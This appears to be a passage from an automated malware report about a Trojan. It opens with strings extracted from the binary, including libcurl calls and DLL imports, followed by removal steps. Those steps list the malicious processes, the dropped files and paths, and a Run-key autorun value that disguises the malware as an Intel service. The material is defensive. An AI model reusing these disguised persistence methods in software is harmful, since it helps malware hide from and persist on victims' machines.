h.44Fr.rl-66Aw-w
O\9..eK9K=W
trh.44Fr.wl-66Aw-
K\9..eK9
.rh.44Fr-wl-66Aw
O9K\9..eKW
r.rh.44Fw-wl-66A
tXXFr.rh.44Aw-wl-66
rj<s.yN>
#[.xU
a-C7}
8.lCd
%sXAA
.hWBB
..r.zb)zKK
..rKzb)zKK
K.EGG
0123456789
curl_easy_cleanup
curl_easy_getinfo
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_easy_strerror
curl_global_cleanup
curl_global_init
curl_slist_append
curl_slist_free_all
pthread_join
pdcurses.dll
_execv
OpenCL.dll
libcurl.dll
pthreadGC2.dll
KERNEL32.dll
msvcrt.dll
WINMM.DLL
WS2_32.DLL
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
msvs.exe:532
mscorsvw.exe:1912
setup.tmp:1772
%original file name%.exe:1368
updater6.exe:1264 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Uninstall_Icon.ico (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISMD5.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Question_Icon.ico (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\en.isl (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\WinTB.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISDone.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ReadMeEn.rtf (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\cancel.ico (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ru.isl (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ISLogo.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\ReadMeRu.rtf (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\logo.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-SQHIE.tmp\Game.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-99IT4.tmp\setup.tmp (22433 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Updater6\updater6.exe (146 bytes)
%Documents and Settings%\%current user%\Application Data\Intel\Services\msvs.exe (67 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Updater6\services.exe (15021 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Local Management Service" = "%Documents and Settings%\%current user%\Application Data\Intel\Services\msvs.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.